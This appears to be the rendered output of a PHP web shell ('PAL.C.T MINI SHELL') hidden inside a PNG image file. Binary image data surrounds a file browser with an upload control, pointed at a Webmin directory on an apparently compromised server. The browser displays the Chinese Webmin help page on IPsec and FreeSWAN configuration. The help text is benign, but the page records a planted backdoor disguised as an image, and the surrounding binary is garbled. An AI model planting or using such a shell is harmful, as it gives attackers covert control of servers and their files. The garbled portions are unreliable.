php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/ipsec/help/
upload
files >> //usr/libexec/webmin/ipsec/help/intro.zh.auto.html

<header> IPsec VPN配置</header>该模块允许您配置FreeSWAN,这是Linux的IPsec VPN协议的免费实现。 IPsec透明地加密了在两个网络之间传输的所有数据,并且与其他VPN协议不同,它使用了VPN的现有IP地址,而不是创建新的IP地址。它通常用于允许远程客户端通过Internet访问私有内部LAN。 <p>为了使两个系统使用IPsec进行通信,每个系统都必须定义一个包含IP地址,标识两个系统的主机名,RSA密钥和专用网络(如果有)的连接。每个已配置的连接将在模块主页上显示为一个图标。通常,创建连接时输入的配置详细信息在两个系统上都是相同的,只是交换了<b>本地</b>和<b>远程</b>部分。每个要使用IPsec进行通信的主机都必须具有用于加密和身份验证的公用/专用密钥对。连接的每一端都必须知道另一端的公钥,该公钥可以存储在连接设置中,也可以从DNS服务器中查找。此模块的“ <b>显示公共密钥”</b>功能可用于显示此主机的密钥。 <p>与其他VPN协议相比,IPsec设置起来更为复杂,但更安全,更强大,并且被认为是行业标准。不幸的是,您可能会犯下许多配置错误,这些错误可能导致连接无法启动,或者仅导致静默地路由通信失败。即使此模块保护您免受简单错误的侵扰,也无法使您免受更严重的概念问题的困扰。 <p><hr>在此模块的主页上,有任何现有IPsec连接的图标以及用于创建新IPsec连接的链接,如果单击它们,两者都将带您进入类似的连接详细信息表格。它们下方是用于编辑全局设置(例如要使用的网络接口)并显示系统公钥的图标。 <p>如果您使用的是FreeSWAN版本2,则还将看到用于编辑各种策略文件的图标,这些文件确定将对各种网络使用哪种通信(加密或清除)。通常,这些参数可以保留不变,因为默认设置是尽可能加密。 <p>页面底部附近是用于启动或停止FreeSWAN服务器进程以及在其运行时应用当前设置的按钮。除非服务器处于活动状态,否则您的系统将无法建立或接收IPsec连接。此部分中的“ <b>启动连接”</b>按钮可用于强制建立IPsec隧道,该隧道在服务器启动时不会自动启动。 <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`